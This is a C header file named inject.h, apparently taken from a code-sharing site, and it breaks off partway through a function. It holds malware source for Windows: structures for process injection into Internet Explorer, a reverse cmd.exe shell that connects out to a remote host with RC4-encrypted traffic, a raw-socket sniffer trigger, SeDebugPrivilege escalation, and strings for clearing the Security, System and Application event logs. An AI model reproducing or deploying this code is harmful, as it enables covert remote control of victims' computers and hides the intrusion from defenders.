📄 inject.h
字号:
tDeregisterEventSource pDeregisterEventSource;
tExitProcess pExitProcess;
char szExitProcess[12];
////
HMODULE hk32,hwinsock,hAdvapi;
// HMODULE husr32;
HANDLE hEvent;
char szApplications[13];
char szSecu[5];
char szSystem[7];
char szRegisterEventSource[21];
char szClearEventLog[15];
char szDeregisterEventSource[22];
// char szPostQuitMessage[20];
char szAdvapi32[13];
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szWSAStartup[11];
char szsocket[7];
char szgethostbyname[14];
char szconnect[8];
char szhtons[6];
char szinet_addr[10];
char host[100];
BOOL Encrypt;
int port;
//for cmd
char szcmdexe[8];
char szGetCurrentProcess[18];
char szDuplicateHandle[16];
char szCreatePipe[11];
char szclosesocket[12];
char szCreateProcess[15];
char szCloseHandle[12];
char szCreateThread[13];
char szWaitForMultipleObjects[23];
char szTerminateThread[16];
char szTerminateProcess[17];
char szDisconnectNamedPipe[20];
////
//data
WSADATA wsaData;
SOCKET client;
struct sockaddr_in local;
LPHOSTENT lpHostEntry;
//////////for cmd
SESSION_DATA Session;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD ThreadId;
HANDLE HandleArray[3];
int i;
HANDLE ShellStdinPipe;
HANDLE ShellStdoutPipe;
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO si;
ReadShellTParam *preadshellpar;
WriteShellTParam *writeshellpar;
//////////
}ConnectParam;
typedef DWORD (WINAPI *tIConnectThread)(ConnectParam *sp);
typedef struct TIEParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateRemoteThread pCreateRemoteThread;
tWriteProcessMemory pWriteProcessMemory;
tVirtualAllocEx pVirtualAllocEx;
// tMBox pMBox;
tCreateProcess pCreateProcess;
tOpenProcess pOpenProcess;
tIConnectThread pIConnectThread;
tISessionWriteShellThread pISessionWriteShellThread;
tISessionReadShellThread pISessionReadShellThread;
int iIConnectThreadsize;
int iISessionWriteShellThreadsize;
int iISessionReadShellThreadsize;
ReadShellTParam *pReadShellTParam;
WriteShellTParam *pWriteShellTParam;
ConnectParam *pConnectParam;
ReadShellTParam *lclpReadShellTParam;
WriteShellTParam *lclpWriteShellTParam;
ConnectParam *lclpConnectParam;
tIConnectThread plclIConnectThread;
tISessionWriteShellThread plclISessionWriteShellThread;
tISessionReadShellThread plclISessionReadShellThread;
HMODULE hk32,hwinsock;
// HMODULE husr32;
HANDLE ie;
DWORD rc;
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO si;
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szCreateProcess[15];
char sziexplorerexe[100];
char szVirtualAllocEx[15];
char szWriteProcessMemory[19];
char szCreateRemoteThread[19];
char szOpenProcess[12];
} IEParam;
typedef DWORD (WINAPI *tIStartInjectIEThread)(IEParam *sp);
typedef struct TSniffParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateThread pCreateThread;
// tMBox pMBox;
tWSAStartup pWSAStartup;
tsocket psocket;
tbind pbind;
// tZeroMemory pZeroMemory;
tWSAIoctl pWSAIoctl;
trecv precv;
tSleep pSleep;
tlstrcpy plstrcpy;
HMODULE hk32,hwinsock,hAdvapi;
// HMODULE husr32;
DWORD rc;
ConnectParam *pConnectParam;
tIConnectThread pIConnectThread;
IEParam *pIEParam;
tIStartInjectIEThread pIStartInjectIEThread;
tOpenProcessToken pOpenProcessToken;
tLookupPrivilegeValue pLookupPrivilegeValue;
tAdjustTokenPrivileges pAdjustTokenPrivileges;
// tGetCurrentProcess pGetCurrentProcess;
BOOL Auth;
//debug prviilage
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
//crypt libs
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
char szLocalPassword[100];
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptDecrypt pCryptDecrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tlstrcmp plstrcmp;
char szlstrcmp[9];
tCloseHandle pCloseHandle;
// HANDLE hf;
// tCreateFile pCreateFile;
// tWriteFile pWriteFile;
// tSetFilePointer pSetFilePointer;
tinet_ntoa pinet_ntoa;
char szinet_ntoa[100];
// char szSetFilePointer[100];
// char szCreateFile[100];
// char szWriteFile[100];
// char filename[100];
// char CR[100];
// DWORD dwBytes;
SOCKADDR_IN saSource;
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptDecrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
char szGetCurrentProcess[18];
//crypt
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szSleep[6];
char szWSAStartup[11];
char szsocket[7];
char szbind[5];
char szrecv[5];
char szWSAIoctl[9];
char szlstrcpy[9];
char szAdjustTokenPrivileges[23];
char szOpenProcessToken[17];
char szLookupPrivilegeValue[22];
char szCloseHandle[12];
//data
WSADATA wsaData;
int sock;
SOCKADDR_IN sa;
DWORD dwBytesRet;
unsigned int optval ;
char RcvBuf[100];
} SniffParam;
// lclsniffpar.pZeroMemory = (tZeroMemory) GetProcAddress( hlib, "ZeroMemory" );
//if ( lclsniffpar.pZeroMemory == 0 ) { MessageBox(0,"err5","",MB_OK); goto cleanup; }
DWORD WINAPI ISessionReadShellThread(ReadShellTParam *RDp)
{
// RDp->husr32 = RDp->pLoadLibrary(RDp->szuser32dll);
RDp->hwinsock = RDp->pLoadLibrary(RDp->szWs232 );
RDp->hk32 =RDp->pLoadLibrary( RDp->szkernel32dll);
RDp->hAdvapi =RDp->pLoadLibrary( RDp->szAdvapi32);
if((RDp->hk32==0)||(RDp->hk32==0)||(RDp->hAdvapi==0)) return 1;
// RDp->pMBox= (tMBox)RDp->pGetProcAddress(RDp->husr32,RDp->szMessageBoxA );
RDp->psend=(tsend)RDp->pGetProcAddress(RDp->hwinsock, RDp->szsend);
RDp->pPeekNamedPipe=(tPeekNamedPipe)RDp->pGetProcAddress(RDp->hk32, RDp->szPeekNamedPipe);
RDp->pReadFile=(tReadFile)RDp->pGetProcAddress(RDp->hk32, RDp->szReadFile);
RDp->pSleep=(tSleep)RDp->pGetProcAddress(RDp->hk32, RDp->szSleep);
RDp->pExitThread=(tExitThread)RDp->pGetProcAddress(RDp->hk32, RDp->szExitThread);
RDp->pCryptAcquireContext=(tCryptAcquireContext)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptAcquireContext);
RDp->pCryptCreateHash=(tCryptCreateHash)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptCreateHash);
RDp->pCryptHashData=(tCryptHashData)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptHashData);
RDp->pCryptDeriveKey=(tCryptDeriveKey)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptDeriveKey);
RDp->pCryptEncrypt=(tCryptEncrypt)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptEncrypt);
RDp->pCryptDestroyKey=(tCryptDestroyKey)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptDestroyKey);
RDp->pCryptDestroyHash=(tCryptDestroyHash)RDp->pGetProcAddress(RDp->hAdvapi,RDp->szCryptDestroyHash);
RDp->pCryptReleaseContext=(tCryptReleaseContext)RDp->pGetProcAddress( RDp->hAdvapi,RDp->szCryptReleaseContext);
RDp->plstrlen=(tlstrlen)RDp->pGetProcAddress(RDp->hk32,RDp->szlstrlen);
if((RDp->pExitThread==0)||(RDp->pSleep==0)||(RDp->pReadFile==0)||(RDp->pPeekNamedPipe==0)||(RDp->psend==0))
return 1;
/////////////////////////////
while (RDp->pPeekNamedPipe(RDp->Session->ReadPipeHandle, RDp->Buff, sizeof(RDp->Buff),&RDp->BytesRead, NULL, NULL))
{
RDp->pSleep(800);
//RDp->pSleep(1);
if (RDp->BytesRead > 0)
{
RDp->pReadFile(RDp->Session->ReadPipeHandle, RDp->Buff, sizeof(RDp->Buff),&RDp->BytesRead, NULL);
if(RDp->Encrypt){
//Encrpt
if (RDp->pCryptAcquireContext(&RDp->hProv, NULL, RDp->CSP, PROV_RSA_FULL, 0))
{
if (RDp->pCryptCreateHash(RDp->hProv, CALG_MD5, 0, 0, &RDp->hHash))
{
RDp->dwLength =RDp->plstrlen(RDp->szLocalPassword);
// RDp->pMBox(0,RDp->szLocalPassword,RDp->szLocalPassword,MB_OK);
if (RDp->pCryptHashData(RDp->hHash, (BYTE *)RDp->szLocalPassword, RDp->dwLength, 0))
{
// RDp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
if (RDp->pCryptDeriveKey(RDp->hProv, CALG_RC4, RDp->hHash, CRYPT_EXPORTABLE, &RDp->hKey))
{
//RDp->dwLength =RDp->EchoCnt;
RDp->pCryptEncrypt(RDp->hKey, 0, TRUE, 0, (BYTE *)RDp->Buff,&RDp->BytesRead,RDp->BytesRead);
RDp->pCryptDestroyKey(RDp->hKey);
//RDp->pMBox(0,RDp->RecvBuff,RDp->RecvBuff,MB_OK);
}
}
RDp->pCryptDestroyHash(RDp->hHash);
}
RDp->pCryptReleaseContext(RDp->hProv, 0);
}//decr end
}
// RDp->pMBox(0,(char *)RDp->Buff,"",MB_OK);
if (RDp->psend(RDp->Session->ClientSocket, (char *)RDp->Buff, RDp->BytesRead, 0) <= 0){
// RDp->pMBox(0,RDp->szCryptDestroyHash,"",MB_OK);
break;
}
}
}
RDp->pExitThread(0);
return 0;
}
static void EndISessionReadShellThread(void)
{
}
DWORD WINAPI ISessionWriteShellThread(WriteShellTParam *WRp)
{
// WRp->husr32 = WRp->pLoadLibrary(WRp->szuser32dll);
WRp->hwinsock = WRp->pLoadLibrary(WRp->szWs232 );
WRp->hk32 =WRp->pLoadLibrary( WRp->szkernel32dll);
WRp->hAdvapi =WRp->pLoadLibrary( WRp->szAdvapi32);
if((WRp->hk32==0)||(WRp->hAdvapi==0)||(WRp->hwinsock==0)) return 1;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -